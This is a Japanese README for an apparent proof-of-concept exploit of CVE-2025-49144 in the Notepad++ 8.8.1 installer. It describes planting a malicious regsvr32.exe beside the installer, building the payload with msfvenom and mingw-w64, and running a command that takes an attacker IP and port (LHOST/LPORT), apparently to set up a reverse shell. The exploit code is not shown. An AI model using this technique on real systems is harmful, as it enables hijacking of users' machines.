
Notepad++ 8.8.1 インストーラーにおける CVE-2025-49144 脆弱性を悪用する概念実証 (PoC)。
このリポジトリには、Notepad++ 8.8.1 インストーラーのCVE-2025-49144脆弱性を悪用する実用的なProof of Concept(PoC)が含まれています。この悪意のある実行は、脆弱なインストーラーと同じディレクトリにバイナリ(regsvr32.exe)を配置することで発生します。インストーラーが実行されると、コンテキストを継承してペイロードがトリガーされます。
⚠️ 免責事項
このコードは教育および研究目的にのみ厳密に意図されています。明示的な許可なくシステムで不正に使用すると、法律違反となる可能性があります。
作者は、このツールの誤用や悪意のある活動について一切責任を負いません。
msfvenom(Metasploit Framework の一部)mingw-w64(x86_64-w64-mingw32-gcc)npp.8.8.1.Installer.x64.exe(同じディレクトリに手動で配置する必要があります)python3 exploit.py -i <LHOST> -p <LPORT>
例:
python3 exploit.py -i 192.168.100.10 -p 4444
これにより、次のファイルが生成されます:
[
]